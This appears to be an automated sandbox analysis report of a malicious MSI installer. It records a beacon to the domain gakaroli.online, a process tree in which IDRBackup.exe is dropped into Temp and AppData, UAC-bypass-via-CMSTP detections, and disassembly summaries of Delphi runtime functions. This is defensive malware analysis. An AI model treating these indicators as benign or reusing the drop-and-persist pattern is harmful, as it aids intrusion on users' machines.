                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 35
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:33 UTC35OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii:
                                                                                                2024-11-30 01:25:34 UTC730INHTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:34 GMT
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nY55A5jt%2F9YCa0XQg28S88KaLvihTeU6N8ya4UaF99S5Gm%2F4UZx1U2I3CrK515K8onKHRHCCa%2F4CmP9beIuNF2h8cOjDHorPDSJU1cIhtgOASTLOlWiFrdKebssL7DFMWoU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70b57ab6842b3-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=14583&min_rtt=13733&rtt_var=5757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1077&delivery_rate=212626&cwnd=236&unsent_bytes=0&cid=6a53900d56674536&ts=686&x=0"


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:20:23:58
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ONHQNHFT.msi"
                                                                                                Imagebase:0x7ff7172e0000
                                                                                                File size:69'632 bytes
                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:20:23:58
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                Imagebase:0x7ff7172e0000
                                                                                                File size:69'632 bytes
                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:20:24:00
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:2'137'808 bytes
                                                                                                MD5 hash:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1802356275.0000000003836000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:20:24:11
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                Imagebase:0x400000
                                                                                                File size:2'137'808 bytes
                                                                                                MD5 hash:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:20:24:24
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2285913902.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:20:24:24
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:20:24:53
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Imagebase:0x140000000
                                                                                                File size:2'364'728 bytes
                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.2619564541.000000000268C000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:20:25:01
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:2'137'808 bytes
                                                                                                MD5 hash:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:20:25:14
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2541651390.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2541893712.000000000505B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:13
                                                                                                Start time:20:25:15
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:18
                                                                                                Start time:20:25:25
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\toolsync_RO\IDRBackup.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:2'137'808 bytes
                                                                                                MD5 hash:371C165E3E3C1A000051B78D7B0E7E79
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:19
                                                                                                Start time:20:25:37
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                Imagebase:0x240000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2897217334.0000000004BFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:20
                                                                                                Start time:20:25:37
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:21
                                                                                                Start time:20:25:52
                                                                                                Start date:29/11/2024
                                                                                                Path:C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                Imagebase:0x140000000
                                                                                                File size:2'364'728 bytes
                                                                                                MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2918194847.00000000025E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Has exited:false

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Non-executed Functions

                                                                                                  Function 5000C58C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 207registrystringlibraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105,59800000,59857008), ref: 5000C5A8
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5C8
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5E6
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                  • RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                  • RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                  • lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 5000C6D7
                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 5000C6E4
                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 5000C6EA
                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 5000C718
                                                                                                  • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 5000C76E
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 5000C77E
                                                                                                  • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 5000C7AE
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 5000C7BE
                                                                                                  • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 5000C7ED
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Openlstrcpyn$LibraryLoadLocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                  • API String ID: 3838733197-345420546
                                                                                                  • Opcode ID: feeedae3e6eb645ae8584e3f9f28829b83a7b9d0ae490e361948e0fb3c0780ec
                                                                                                  • Instruction ID: 6e1fecd616c3af7657caa769789cc1cef116f98790ddf8cab21a8ed1a68448cd
                                                                                                  • Opcode Fuzzy Hash: feeedae3e6eb645ae8584e3f9f28829b83a7b9d0ae490e361948e0fb3c0780ec
                                                                                                  • Instruction Fuzzy Hash: 586164719402597AFB10DBE4DC55FEE73FCDB08310F944262B604E65C1EBB4DA448BA5
                                                                                                  Function 5000C390 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 152stringlibraryfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,59800000,59857008), ref: 5000C3AD
                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 5000C3C4
                                                                                                  • lstrcpynW.KERNEL32(?,?,?,?,59800000,59857008), ref: 5000C3F4
                                                                                                  • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C463
                                                                                                  • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C4AB
                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C4BE
                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C4D4
                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,59800000,59857008), ref: 5000C4E0
                                                                                                  • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,59800000), ref: 5000C51C
                                                                                                  • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 5000C528
                                                                                                  • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 5000C54B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                  • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                                  • API String ID: 3245196872-3908791685
                                                                                                  • Opcode ID: b89c123a30ed1ecf070351e2f3e41b55a218454057482099c22ae11a49ac5007
                                                                                                  • Instruction ID: 5d7dfac9b9f2aeec60bfe0aae1cd48dcbb1e4dc617a3dbbec08934bed254d2f5
                                                                                                  • Opcode Fuzzy Hash: b89c123a30ed1ecf070351e2f3e41b55a218454057482099c22ae11a49ac5007
                                                                                                  • Instruction Fuzzy Hash: 65518371D006589BEB10DBE8DC94EDEB3F8EB44320F8446A5A614E7241E774EE848B90
                                                                                                  Function 5001C0CC Relevance: 6.0, APIs: 4, Instructions: 33fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E1
                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C0E7
                                                                                                  • GetLastError.KERNEL32(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C10C
                                                                                                    • Part of subcall function 5001C048: FileTimeToLocalFileTime.KERNEL32(?), ref: 5001C078
                                                                                                    • Part of subcall function 5001C048: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 5001C087
                                                                                                    • Part of subcall function 5001C048: @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001C0BD
                                                                                                  • @Sysutils@FindClose$qqrr19Sysutils@TSearchRec.RTL120(00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C105
                                                                                                    • Part of subcall function 5001C140: FindClose.KERNEL32(?,?,5001C10A,00000000,?,?,?,?,5001CB91,00000000,5001CBDD,?,00000000,5001CC45), ref: 5001C14C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$Find$System@System@@Sysutils@Unicode$Array$qqrr20Char$qqrx20CloseClose$qqrr19DateErrorFirstFromLastLocalSearchStringStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2742389685-0
                                                                                                  • Opcode ID: 0e6a76c3268d9445fd7af8d569e44dfda8a80cbea70c39b2be0f1572241ae030
                                                                                                  • Instruction ID: b28d0052824deb1cb2ffbfc90362c48fba345adbb55124768b9dcd6cc0dc1853
                                                                                                  • Opcode Fuzzy Hash: 0e6a76c3268d9445fd7af8d569e44dfda8a80cbea70c39b2be0f1572241ae030
                                                                                                  • Instruction Fuzzy Hash: 1CE02B73B021A0171B155FBC6CC189E61C84B956B03490377FA18EB307D628CC4643D0
                                                                                                  Function 5001D4C4 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 5001D4E5
                                                                                                  • @System@@_llmul$qqrv.RTL120(?,00000000,?,?,?,?,?,?), ref: 5001D507
                                                                                                  • @System@@_llmul$qqrv.RTL120(?,00000000,?,?,?,?,?,?), ref: 5001D521
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@_llmul$qqrv$DiskFreeSpace
                                                                                                  • String ID:
                                                                                                  • API String ID: 50643528-0
                                                                                                  • Opcode ID: f4eae7a069fc1b4a7a09ee1b588b4b1cdc4b33683fb77737d06db2c0557a1bba
                                                                                                  • Instruction ID: 0c4a846b8cec236fdab0fe660197de8149f70c443eb820fd00f8eb9c4a30d1bf
                                                                                                  • Opcode Fuzzy Hash: f4eae7a069fc1b4a7a09ee1b588b4b1cdc4b33683fb77737d06db2c0557a1bba
                                                                                                  • Instruction Fuzzy Hash: 56111EB5E01609AF9B04CF99C881DEFF7F9FFC8300B54C56AA408E7251E6319A418BA0
                                                                                                  Function 50025B78 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 50025B96
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,00000100), ref: 50025BAA
                                                                                                    • Part of subcall function 50009E7C: @System@@NewUnicodeString$qqri.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E87
                                                                                                    • Part of subcall function 50009E7C: @System@Move$qqrpxvpvi.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E9A
                                                                                                    • Part of subcall function 50009E7C: @System@@LStrClr$qqrpv.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009EA1
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,00000100), ref: 50025BB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
